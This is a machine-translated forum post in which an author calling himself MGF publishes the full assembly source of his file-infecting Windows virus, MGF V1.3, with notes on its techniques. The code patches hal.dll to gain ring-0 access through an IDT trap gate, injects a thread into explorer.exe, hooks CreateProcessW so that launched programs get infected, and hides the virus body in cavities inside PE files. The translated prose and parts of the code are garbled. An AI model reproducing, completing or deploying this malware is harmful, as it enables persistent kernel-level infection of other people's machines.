Author of the article: MGF sources of information: Evil octal information security team (www.eviloctal.com)
Source code of MGF V1.3: Hello everyone! I am MGF. 2 years ago, because of my MGF, I brought a trouble, so I "closed", I went to work, and I was inocating nearly 2 years. Now I see "The wind has passed", and I dare to dare to show the show. Now my latest MGF has come out again (there is no spread), or my consistent style, there is no destruction, just talk about technology, I hope to read the following code; Friends can learn some technology, inspiration.
; Related techniques:; 1, hook hal.dll's exacquirefastmutex (). Execute my code before the function is executed, add the Int FE trap door to IDT. After restarting, you can get RING0 ;; (this Microsoft makes it wrong, no Hal.dll, and exacquirefastmutex () is the first exported function (very convenient hook), and an execution is very frequent The function is more difficult to use than the modification of NTLDR. It is one of the two vulnerabilities I found to enter Ring0 (the first NTLDR vulnerability everyone knows). I have already sent the email to Microsoft, but no As a result, it seems to continue MS!)
2, use new method hook createprocessw () to infect files. CreateProcessW () just calls a createProcessInternalW () to complete its own features; the code is:
Exported fn (): createprocessw - ORD: 0060H;: 77E41B8A 55 Push EBP;: 77E41B8B 8BEC MOV EBP, ESP;: 77E41B8D 6A00 PUSH 00000000;: 77E41B8F FF752C PUSH [EBP 2C] // CreateProcessW () 10th Parameters; 77E41B92 FF7528 PUSH [EBP 28] // CreateProcessW () of the 9th parameter;: 77E41B95 FF7524 PUSH [EBP 24] // CreateProcessW () of the 8th parameter;: 77E41B98 FF7520 PUSH [EBP 20 ] // CreateProcessW () of the 7th parameter;: 77E41B9B FF751C PUSH [EBP 1C] // CreateProcessW () of the sixth parameter;: 77E41B9E FF7518 PUSH [EBP 18] // CreateProcessW () of the 5th Parameters; 77E41BA1 FF7514 PUSH [EBP 14] // CreateProcessW () of the fourth parameter;: 77E41BA4 FF7510 PUSH [EBP 10] // CreateProcessW () of the third parameter;: 77E41BA7 FF750C PUSH [EBP 0C ] // CreateProcessW () of the second parameter;: 77E41BAA FF7508 PUSH [EBP 08] // CreateProcessW () of the first parameter;: 77E41BAD 6A00 PUSH 00000000; * Reference to: kernel32.createProcessin TERNALW; |;: 77E41BAF E83EBE0100 CALL 77E5D9F2 // Note that this CALL directive, as long as the relative address behind its machine code E8 is hook;: 77E41BB4 5D POP EBP;: 77E41BB5 C22800 RET 0028; What do you find this CALL instruction? As long as you search for 086A00E8 in CreateProcessW (), 08 is part of the machine code FF7508 of PUSH [EBP 08],; it and the latter PUSH 00000000 machine code 6A00 is connected together, and 6A00 and Call The machine code E8 of 77E5D9F2 is connected together, so you can find the characteristics of 086A00E8; to find the Call 77E5D9F2 || Call kernel32.createProcessInternalW.
3, using the voids that are separated into a segment into the PE file to infect files, do not increase the length of the file. Search with your own function to search for dozens of space for 0 in the PE file, put it; the space is collected, if these spaces can be loaded, infection, otherwise it is not infected. In this way, the virus has a request: there must be a boot code that collects dispersed in the host process; collected into the assigned memory, this 0x1D0 size boot code cannot be split, and there must be one infected with the PE file Continuous space can accommodate the 0x1D0 size; guide code, otherwise, even if the total gap of the file is large, it can be loaded with viruses, but it is not infected. This virus can be run directly after successful compilation, and the function of the memory infection file has been skipped with JMP instructions. After compile, the size 0xB23 (2951) byte can be infected with Windows, Calc.exe, Charmap . EXE, SOL.EXE, NOTEPAD.EXE, OSK.exe, etc., but may destroy the installation file when infecting the installation file, because the installation file is self-extracting, CRC testing; etc. (have been tested).
.586p.model flat, stdcalloption casemap: None
INCLUDE Windows.Include kernel32.incinclude user32.incinclude advapi32.include mpr.incincludelib kernel32.libincludelib user32.libludelib advapi32.libincludelib mpr.lib
Virussize = Offset Virusend-Offset VirusStart
.codevirusstart:; Int 3noppushad
DB 0E8H, 3, 0, 0, 0, 'Mgf'Pop EdxSub EDX, $ - 4MOV EBX, EDX; calculates the repositioning value, some deformation
.IF EBXMOV EDX, [ESP 24h] .elsemov EDX, [ESP 20H] .endifcall _getmoduleaddressmov EBP, EBP; EBP = Hkernel32
Bt Eax, 31jc_ERRROREXIT; if it is Windows 9x, return to the original program entry
Push 0A5171D00H; Virtualalloc () Custom Code Push EBP; Hkernel32Call_GetProcAddress; first get the address or Eax, Eaxjz_ERROREXIT
Push 40hpush 1000hpush 1000hpush 0Call EAX; call virtualalloc () Assign 4K memory or eax, eaxjz _ERROREXIT
Mov Edi, EAX
Lea edx, _seaddress [ebx] .While DWORD PTR [EDX] MOV ESI, [EDX] MOV ECX, [EDX 4] Rep Movsb; collectiviral bodies dispersed in the host process to merge Add EDX, 8 .endw
Lea ECX, [Eax (Offset _newstart-offset virusstart] JMP ECX; jump to the new address to continue
_ERRROREXIT: POPADRET
Define the subroutine of the function address based on the function custom encoding, such as the custom code of Virtualalloc () is 0A5171D00H_GetProcaddress Proc_HModule, _ProccNamepushad
Mov Edx, _HModuleAdd Edx, [EDX 3CH] MOV EDX, [EDX 78H] Add Edx, _HModuleMov ECX, [EDX 18H] MOV ESI, [EDX 20H] Add ESI, _HModule @@: push ecxlodsdadd eax, _hmodulexor EDI, EDI.RepeATMOV ECX, [EAX] Inc Eaxadc Edi, ECXROL ECX, 8.Until Cl == 0cmp Edi, _ProcNamePop ECXLOOPNZ @B
. IF ZERO? SUB ESI, 4SUB ESI, _HModulesub ESI, [EDX 20H] SHR ESI, 1Add ESI, [EDX 24h] Add ESI, _HModuleLodsdmovzx Eax, Axshl Eax, 2Add Eax, [EDX 1CH] Add Eax, _hmodulemov EDX, [EAX] Add Edx, _HModuleMov [ESP 1CH], EDX.ELSEMOV DWORD PTR [ESP 1CH], 0.Endif
POPADRET_GETPROCADDRESS ENDP
Get the subroutine of the Hkernel32 address; in = EDX, OUT = Eax_getmoduleaddress: @@: and dx, 0f000hsub EDX, 1000HCMP WORD PTR [EDX], 'Zm'jnz @BMOV EAX, EdxAdd Edx, [EDX 3CH] CMP DWORD PTR [EDX], 'ep'jnz @Bret
DwoldENTRYCOM DB 0, 0, 0, 0; Save 5 bytes of the top 5 bytes of the original procedure of the PE file
Duan chain table, which records the address and size of viral body in PE files in PE file _SECTIONADDRESS: DD Offset VirusStartDD Virussizedd 18h * 2 DUP (0)
The new execution point, jumps here after the boot code collects the viral body to the memory to the application. Code from here to VirusStart is boot code, can not be split_newstart: DB 0e8H, 3, 0, 0, 0, 'Mgf'Pop EdxSub EDX, $ - 4XCHG EBX, EDX; Relocation
.IF EDX; If the host process is running, restore the original entry code SUB DWORD PTR [ESP 20H], 5MOV EDX, [ESP 20H] MOV Al, DwoldenTrycom [EBX] MOV [EDX], Almov Eax, DWORD PTR DwoldENTRYCOM [EBX 1] MOV [EDX 1], EAX.Endif
; Get all the required blocks API address lea esi, FunctionNameTab [ebx] lea edi, FunctionAddressTab [ebx] @@: lodsdpush eaxpush ebpcall _GetProcAddressstosdcmp dword ptr [esi], 0loopnz @blea eax, szGetLastError [ebx] push eaxpush ebpcall dwGetProcAddress [ebx] stosd
Mov EDX, 398HLAR EAX, EDX.IF EAX == 00cffb00h; If you find a signature in GDT, enter Ring0Int 0Fehmov Eax, Espmov ESP, [ESP 8] Push EAX
Mov Eax, CR0PUSH EAXBTR EAX, 16MOV CR0, EAX
MOV EDX, DWCREATEPROCESSINTERNALW [EBX] Sub EDX, EBPLEA ECX, [EBPLEA ECX, [EDX- (380H (Offset _Jmpoffset-Offset VirusStart)] MOV DWORD PTR _JMPOFFSET [EBX-4], ECX; calculates the address difference of the Call instruction, [EBP 380h] Lea ESI, VirusStart [EBX] Push 16POP ECXPUSHADREPZ CMPSB; Decades whether the virus has resident in memory popad.if! Zero? Mov ECX, VirussizRep Movsb; resident memory
mov edx, dwCreateProcessW [ebx] mov ecx, 80h @@: inc edxcmp dword ptr [edx], 0e8006a08h; search CALL CreateProcessInternalW signature loopnz @blea ecx, [edx 8] sub ecx, ebpsub ecx, 380h offset _NewCreateProcessW -offset VirusStartneg ECXMOV [EDX 4], ECX; Change the machine code of Call CreateProcessInternalW, hook createprocessw (). Endif
POP Eaxmov CR0, EAX
POP Esplea Eax, @ f [EBX] Push EaxDB 0CFH; IRETD instruction, return @@:
If only the first time, there is no trap door in the memory, modify the HAL.DLL, establish a remote thread to Explorer.exe hook createprocessw () infection file Lea Eax, szgetlasterror [EBX] Push Eaxpush 1PUSH 0CALL DWCREATEMUTEXA [EBX ]; With Mutex to ensure that remote thread only creates Call DwgetLastError [EBX] .IF EAX! = 0B7H
ENTER 200H, 0
mov edi, esppush 60hpush edicall dwGetSystemDirectoryW [ebx] shl eax, 1mov dword ptr [edi eax], 0068005chmov dword ptr [edi eax 4], 006c0061hmov dword ptr [edi eax 8], 0064002ehmov dword ptr [edi EAX 12], 006C006CHMOV DWORD PTR [EDI EAX 16], 0; Construct C: /Windows/System32/hal.dll string (Unicode code) Push 1push edicall _EDitfile; modify the HAL.DLL file, hook exacquirefastmutex ()
XOR ESI, ESIREPEATPUSH 5000CALL DWSLEP [EBX] Push 0push 2Call dwcreatetoolhelp32snapshot [EBX]; Search Explorer.exe process MOV [EBP-4], EAX
mov dword ptr [edi], 128hpush edipush eaxcall dwProcess32First [ebx] .while eaxlea edx, [edi 24h] push 12push edxcall _Str2Upper.if dword ptr [edi 24h] == 'LPXE' && dword ptr [edi 24h 4] == 'RERO' && DWORD PTR [EDI 24H 8] == 'Exe.Push DWORD PTR [EDI 8] Push ESIPUSH 2AHCALL DWOPENPROCESS [EBX]; Open Explorer.exe Process. IF EAXMOV [EBP- 8], eaxpush 40hpush 1000hpush 1000hpush esipush eaxcall dwVirtualAllocEx [ebx]; allocate memory mov edi in EXPLORER.EXE process where, eaxlea edx, VirusStart [ebx] push esipush 1000hpush edxpush edipush dword ptr [ebp-8] call dwWriteProcessMemory [ebx]; the virion write EXPLORER.EXE process in lea eax, [edi (offset _RemoteThread-offset VirusStart)] push esipush esipush esipush eaxpush esipush esipush dword ptr [ebp-8] call dwCreateRemoteThread [ebx]; in the process of establishing the EXPLORER.EXE Remote thread Push DWORD PTR [EBP-8] Call dwcloseHandle [EBX] MOV ESI, ESP.BREAK.ENDIF.Endif.endif
Push EDIPUSH DWORD PTR [EBP-4] Call dwprocess32next [ebx] .endw
Push DWORD PTR [EBP-4] Call dwcloseHandle [EBX] .until ESI
Leave
.endif
.endif
Popadret
Remote threads in Explorer, functionality is hook createprocessw (), infection file_RemothetRead Proc P1pushaddb 0e8h, 3,0,0,0, 'mgf'Pop EdxSub EDX, $ - 4MOV EBX, EDX
Lea Eax, Szgetlasterror [EBX] Push Eaxpush 1PUSH 0CALL DWCREATEMUTEXA [EBX]; establish MUTEX
MOV EDI, DWCREATEPROCESSW [EBX] PUSH ECXPUSH ESPPUSH 40HPUSH 1000HPUSH EDICALL DWVIRTUALPROTECT [EBX]; Remove Readpread Properties POP ECX
.IF Eaxmov Edx, DwcreateProcessinternalw [EBX] Lea ECX, _JMPOFFSET [EBX] Sub EDX, ECXMOV DWORD PTR _JMPOFFSET [EBX-4], EDX; calculate the relative address between 2 instructions
MOV ECX, 80H @@: Inc EdiCMP DWORD PTR [EDI], 0E8006A08H; Search for the signature of Call CreateProcessinternalW LOOPNZ @blea ECX, [EDI 8] Lea Edx, _newcreateProcessw [EBX] Sub EDX, ECXMOV [EDI 4], EDX; Change the machine code of Call CreateProcessInternalW, hook createprocessw (). endifpopadret_remotehread endp
_Newcreateprocessw:; CreateProcessW () after Hook () Pushaddb 0e8h, 3, 0, 0, 0, 'Mgf'Pop EdxSub EDX, $ - 4MOV EBX, EDX; Relocation
MOV EDI, [ESP 20H 12] Inc Ediinc Edimov ESI, EDIPUSH 22HPOP Eaxmov ECX, 100HREPNZ SCASWMOV BYTE PTR [EDI-2], 0; Treat CreateProcessW () parameters
JMP @f; this instruction allows the system to skip the following infected PE files, if you want to track the infected file process, you can keep EIP = EIP 2 when tracking it here, continue to track the process of infecting the infected file PUSH 0PUSH Esicall _EDITFILE; infection will be executed by CreateProcessw () @@:
MOV BYTE PTR [EDI-2], 22HPOPADDB 0E9HDD 0_JMPOFFSET:
_EditFile proc _lpFileName, _dwFlag; subroutine infected file, _dwFlag = 0 infect normal PE file, _dwFlag = 1 when modifying the file HAL.DLL local @hFilelocal @hFileMaplocal @lpFileMaplocal @dwFileSizelocal @dwFileAttributeslocal @ stFileTime1: FILETIMElocal @ stFileTime2: FILETIMElocal @ StFileTime3: filetimelocal @sztempBuffer [100h]: bytepushad
Push _lpfilenamecall dwgetfileAttributesw [ebx] .IF Eax! = - 1mov @ dwfileAttributes, EAX
Push 80hpush _lpfilenamecall dwsetfileAttributesw [EBX]
Push 0push 80hpush 3push 0push 3PUSH 0C0000000HPUSH _LPFILENAMECALL DWCREATEFILEW [EBX] .IF EAX! = - 1MOV @ Hfile, EAX
Push EaxCall DwgetFileType [EBX] .IF EAX == file_type_disk
Push 0push @HfileCall DwgetFileSize [EBX] MOV @ dwfilesize, EAX
Lea Eax, @ stfiletime3push Eaxle Eax, @ stfiletime2push eaxlea eax, @ stfiletime1push eaxpush @HfileCall DwgetFileTime [EBX]
push 0push 0push 0push 4push 0push @hFilecall dwCreateFileMappingW [ebx] .if eaxmov @ hFileMap, eaxpush 0push 0push 0push 6push eaxcall dwMapViewOfFile [ebx] .if eaxmov @ lpFileMap, eax
.IF Word PTR [EAX] == 'zm'.if DWORD PTR [EAX 38H]! =' fgm'add Eax, [EAX 3CH] .IF DWORD PTR [EAX] == 'EP'BT DWORD PTR [ EAX 16H], 13.IF! carry?
Lea EDI, @ SztempBuffermov Eax, @ lpfilemapmov Edx, @ dwfilesizepush 18hpop Ecx @@: push ECX
push VirusSize / 18hpush edxpush eaxcall _FindSpace; search in the infected PE file space .if eaxpush eaxpush 0push eaxpush @lpFileMapcall _TranslateAddr; determine whether the space to find an effective cmp eax, 1pop eaxjl _EditFile1stosd; save valid address space segment to the list xchg eax, EDXSTOSD; Save the size of the effective space to segment table xchg eax, edx_editfile1: add eax, edxmov ECX, EXSUB ECX, @ lpfilemapmov Edx, @ dwfilesizesub edx, @ dwfilesizesub Edx, Ecx.Endif
OR EAX, EaxPop ECXLOOPNZ @B; Continue search space xor eax, Eaxstosdstos
Push 4POP EDX.WHILE DWORD PTR [@ SztempBuffer EDX]; this loop is used to adjust the found space chain
.IF DWORD PTR [@ SztempBuffer EDX]> = Virussize; if a space can accommodate the entire virus, the space is used as the first item of the chain, and the viral body is written to the space MOV Eax, DWORD PTR [ @ szTempBuffer edx-4] mov dword ptr @ szTempBuffer, eaxmov eax, dword ptr [@ szTempBuffer edx] mov dword ptr @ szTempBuffer 4, eaxxor eax, eaxmov dword ptr @ szTempBuffer 8, eaxmov dword ptr @ szTempBuffer 12 , eax.break.elseif dword ptr [@ szTempBuffer edx]> = offset _NewStart-offset VirusStartmov eax, dword ptr [@ szTempBuffer edx-4] xchg dword ptr @ szTempBuffer, eaxmov dword ptr [@ szTempBuffer edx-4] , Eaxmov Eax, DWORD PTR [@ SztempBuffer EDX] XCHG DWORD PTR @ SztempBuffer 4, Eaxmov DWORD PTR [@ SztempBuffer EDX], EAX; if there is no space, you can put it under the entire virus, let go of the boot code The space is adjusted to the first item of the chain. Break.EndifAdd Edx, 8.Endw
Push 4POP Edxxor Eax, Eax.While Dword PTR [@ SztempBuffer EDX] Add Eax, DWORD PTR [@ SztempBuffer EDX]; Calculate All Space Size Add Edx, 8.Endw
.IF DWORD PTR [@ SztempBuffer 4]> = Offset _newstart-offset virusstart; if the first chain is loaded under the boot code, continue, otherwise quit .if dword ptr [@ SzTempBuffer 4]> = Virussize || Eax > = Virussize; if the first chain is loaded under the entire virion or all gaps can continue
Mov Eax, Virussizelea Esi, VirusStart [EBX] .While Dword PTR [EDX] .IF DWORD PTR [EDX 4]> = EaxMov DWORD PTR [EDX 4], EAX.Endifmov Edi, [EDX] MOV ECX, [EDX 4] Rep Movsb; divide the viral body into multiple partial writes Sub Eax, [EDX 4]. Break .IF! EaxAdd Edx, 8.Endwxor Eax, Eaxmov [EDX 8], EAXMOV [EDX 12], EAX
Lea ESI, @ sztempbuffermov Edi, [ESI] Add Edi, Offset _SECTIONADDRESS-OFFSET VIRUSSTART
Mov Edx, ESIWHILE DWORD PTR [EDX] Push 2PUSH DWORD PTR [EDX] Push @lpfilemapcall _TranslateAddrmov [EDX], EAX; convert the address in the address chain to virtual addresses and write PE file Add Edx, 8.Endwpush 19h * 2pop ecxpushadrep movsdpopadmov edx, @ lpFileMap; save, and modify the program instructions inlet add edx, [edx 3ch] push 3push dword ptr [edx 28h] push @lpFileMapcall _TranslateAddrmov esi, eaxmov cl, [esi] mov byte ptr [edi- 5], clmov ecx, [esi 1] mov dword ptr [edi-4], ecxsub edi, offset _SectionAddress-offset VirusStartpush 2push edipush @lpFileMapcall _TranslateAddrsub eax, [edx 34h] sub eax, [edx 28h] sub eax , 5mov Byte Ptr [ESI], 0E8HMOV [ESI 1], EAX
Movzx Eax, Word PTR [EDX 14H] Add Eax, 18HMOVZX ECX, Word PTR [EDX 6] Add Edx, Eax.Repeatmov Eax, [EDX 10h] .IF [EDX 8] MOV EAX, @ lpfilemapmov DWORD PTR [EAX 38H], 'FGM'; in the file header marked infected sign. Nendif.Endif .ELSEIF _DWFLAG == 1; if _dwflag == 1, modify hal.dll, hook exacquirefastmutex () MOV EAX, [EAX 54H] MOV EDX, @ lpfilemapadd edx, EaxSub Eax, @ dwfilesizeneg Eax; Adjustment Search Address push offset ring0apiend-offset ring0apistartpush eaxpush edxcall _FindSpace; HAL.DLL after the PE header search space start .if eaxmov edi, eaxlea esi, ring0apistart [ebx] mov ecx, offset ring0apiend-offset ring0apistartrep movsb; HOOK code into the HAL. DLL Push 2PUSH Eaxpush @lpfilemapcall _translateAddr; Hook code file address to virtual address MOV ESI, EAX Mov Edx, @ lpfilemapmov DWORD PTR [EDX 38H], 'FGM'Add EDX, [EDX 3CH] SUB ESI, [EDX 34H] MOV ECX, [EDX 78H] Push 3Push Ecxpush @lpFileMapCall_TranslateAddr; Export Table Address converted to file address MOV ECX, [EAX 1CH] Push 3PUSH ECXPUSH @lpfilemapCall _TranslateAddr; Export Function Address Table Address to File Address, Save in Eax XCHG ESI, [EAX]; Modify EXACQUIREFASTMUTEX () The entry address of the hook code address Push 2Push 2push 2push edipush @lpfilemapcall _translateAddr; Hook code is running to turn to the original exacquirefastmutex () Continue, here to convert the JMP instruction file address is virtual Address SUB EAX, [EDX 34H] Sub ESI, EAXMOV [EDI-4], ESI; address difference writes the last JMP instruction of HOOK code MOV DWORD PTR [EDX 58H], 0push @dwfilesizepush @lpfilemapcall _Checksummov [EDX 58H], EAX; recalculate the checksum value of Hal.dll and fill in PE header. .endif; 'DLL' .endif; 'EP' .endif ;! 'fgm' .endif; 'zm' Push @lpfilemapcall dwunmapViewoffile [ebx] .endif Push @hfilemapcall dwclosehandle [ebx] .endif Lea Eax, @ stfiletime3push eaxlea eax, @ stfiletime2push eaxlea eax, @ stfiletime1push eaxpush @HfileCall dwsetfiletime [ebx] .endif Push @HfileCall dwclosehandle [ebx] .endif Push @dwfileAttributespush _lpfilenamecall dwsetfileAttributesw [ebx] .endif POPADRET_EDITFILE ENDP Search in the PE files, the space for 0, the function returns the value in Eax and EDX; out: eax = addr, edx = size_findspace proc _startaddress, _size, _requiresizepushfdpush ESIPUSH EdiDICLD MOV EAX, _Startaddress.if Word PTR [EAX] == 'Zm'Add Eax, [Eax 3ch] .IF DWORD PTR [EAX] ==' Ep'movzx EDX, Word PTR [EAX 14H] Add Edx, 18HADD EDX, EAXSUB EDX, _STARTDRESSUB _SIZE, EDXADD _STARTDRESS, EDX.ENDIF.ENDIF mov edi, _StartAddressmov ecx, _Sizeshr ecx, 2xor eax, eax @@: repnz scasdlea esi, [edi-4] mov edx, esirepz scasdsub edx, edineg edxsub edx, 4jecxz _FindSpace1cmp edx, _RequireSizejb @ b_FindSpace1: .if edx> = _ RequireSizelea Eax, [ESI 4] Sub EDX, 4.ENDIF POP edipop esipfdret_findspace ENDP File address and virtual address mutual conversion function; Flag: Bit0 = 0 file address is converted to virtual address; bit0 = 1 virtual address is converted to file address; bit1 = 0 normal conversion; bit1 = 1 forced conversion _translateaddr proc_hmodule, _addr , _Flaglocal @dwflagxor eax, eaxpushad Mov Eax, _flagshr EAX, 1MOV @ dwflag, eaxand byte ptr _flag, 1MOV EAX, _HModuleAdd Eax, [Eax 3ch] Movzx EDX, Word PTR [EAX 14H] Add Edx, 18HADD EDX, EAX MOV ECX, _ADDR.IF _FLAG == 0 && ECX> _HModulesub ECX, _HModule.ELSEIF _FLAG == 1 && ECX> [EAX 34H] Sub ECX, [EAX 34H] .endifmov _addr, ECX .IF ECX <[EAX 54H] .IF _FLAG == 0Add ECX, [EAX 34H] .elseAdd ECX, _HModule.Endifmov [ESP 1CH], ECXJMP _TranslateAddr1.Endif Movzx ECX, Word PTR [EAX 6] .repeat.if _flag == 0mov ESI, [EDX 14H] MOV EDI, [EDX 10H] Add Edi, ESI.ELSEMOV ESI, [EDX 12] MOV EDI, [ EDX 8] Add Edi, ESI.Endif .IF _addr> = ESI && _ADDR .IF! @dwflagtest Byte PTR [EDX 27H], 80H.IF! ZERO? MOV DWORD PTR [ESP 1CH], - 1.Break.Endif.Endif SUB ESI, _ADDRNEG ESIF _FLAG == 0Add ESI, [EDX 12] Add ESI, [EAX 34H] .elseadd ESI, [EDX 14H] Add ESI, _HModule.Endifmov [ESP 1CH], ESI.BREAK .endif Add Edx, 28H.Break .IF! Ecx.untilcxz _TranslateAddr1: popadrad_translateaddr ENDP _Checksum proc _lpaddr, _size; calculate PE Checksum function PUSHAD Mov ECX, _sizeshr ECX, 1PUSHFD XOR EDX, EDXMOV ESI, _Lpaddr.Repeatlodswadc DX, AX.untilcxz POPFD.IF Carry? Lodsbmov AH, 0ADC DX, AX.Endif Add Edx, _Sizemov [ESP 1CH], EDX POPADRET_CHECKSUM ENDP _Str2Upper proc _lpString, _Sizepushadmov esi, _lpStringmov edi, esimov ecx, _Size.if ecx.repeatlodsb.if al> = 'a' && al <= 'z'sub al, 20h.endifstosb.untilcxz.endifpopadret_Str2Upper endp Hal.dll Export EXACQUIREXEX () hook code, used to establish int Fe traps, establish selector = 390h 0-level 32-bit code segment and a signature rING0APistart: Pushfdpushad Push EBPSGDT FWORD PTR [ESP-2] POP EBXMOV EDI, 390H .IF DWORD PTR [EBX EDI 12]! = 00cffb00hle EDX, [EBX EDI 8] MOV BYTE PTR [EDX], 0C3HMOV DWORD PTR [EBX EDI], 0000ffffhmov DWORD PTR [EBX EDI 4], 00cf9b00hmov Byte PTR [EBX EDI 8], 0C3HMOV DWORD PTR [EBX EDI 12], 00cffb00h Push EBPSIDT FWORD PTR [ESP-2] POP EBXMOV ESI, 0FEH * 8 MOV DWORD PTR [EBX ESI], EDXMOV DWORD PTR [EBX ESI 4], EDXMOV DWORD PTR [EBX ESI 2], 0EF000390H.Endif POPADPOPFDDB 0E9H; JMP EXACQUIREFASTMUTEX () instruction, the following address difference is randomly calculated to fill in DD 0Ring0apiend: ; WIN API custom code table FunctionNameTab: szCreateProcessW dd 074D9F4C0hszCreateFileW dd 01479946FhszGetFileAttributesW dd 004788654hszSetFileAttributesW dd 004788660hszCreateFileMappingW dd 0E3486339hszMapViewOfFile dd 0D444401DhszUnmapViewOfFile dd 0A6131C00hszGetFileSize dd 01E92925ChszGetFileTime dd 01286865DhszSetFileTime dd 012868669hszGetFileType dd 02599996DhszCloseHandle dd 027969D71hszGetSystemDirectoryW dd 0980C19E1hszCreateProcessInternalW dd 0B51A3504hszSleep dd 0D63B3724hszCreateToolhelp32Snapshot dd 03EA3A16DhszProcess32First dd 01F8E8C65hszProcess32Next dd 0B62522F7hszOpenProcess dd 050B5B28BhszVirtualAllocEx dd 062D4C5D2HSZWRITEPROCESSMEMORY DD 037A09978HSZCREATEREMOTHREAD DD 004697753HSZVIRTUALPROTECT DD 09C0E02F1HSZCREATEMUTEXA DD 091F727EFHSZGETPROCADDRESS DD 05ED2C494H DD 0 FunctionAddressTab: dwCreateProcessW dd 0dwCreateFileW dd 0dwGetFileAttributesW dd 0dwSetFileAttributesW dd 0dwCreateFileMappingW dd 0dwMapViewOfFile dd 0dwUnmapViewOfFile dd 0dwGetFileSize dd 0dwGetFileTime dd 0dwSetFileTime dd 0dwGetFileType dd 0dwCloseHandle dd 0dwGetSystemDirectoryW dd 0dwCreateProcessInternalW dd 0dwSleep dd 0dwCreateToolhelp32Snapshot dd 0dwProcess32First dd 0dwProcess32Next dd 0dwOpenProcess dd 0dwVirtualAllocEx dd 0dwWriteProcessMemory dd 0dwCreateRemoteThread dd 0dwVirtualProtect dd 0dwCreateMutexA dd 0DWGETPROCADDRESS DD 0DWGETLASTERROR DD 0 Szgetlasterror DB 'getLastError', 0Szversion DB 'MGF VER1.3', 0 Virusend: Invoke EXIXTPROCESS, 0 End VirusStart
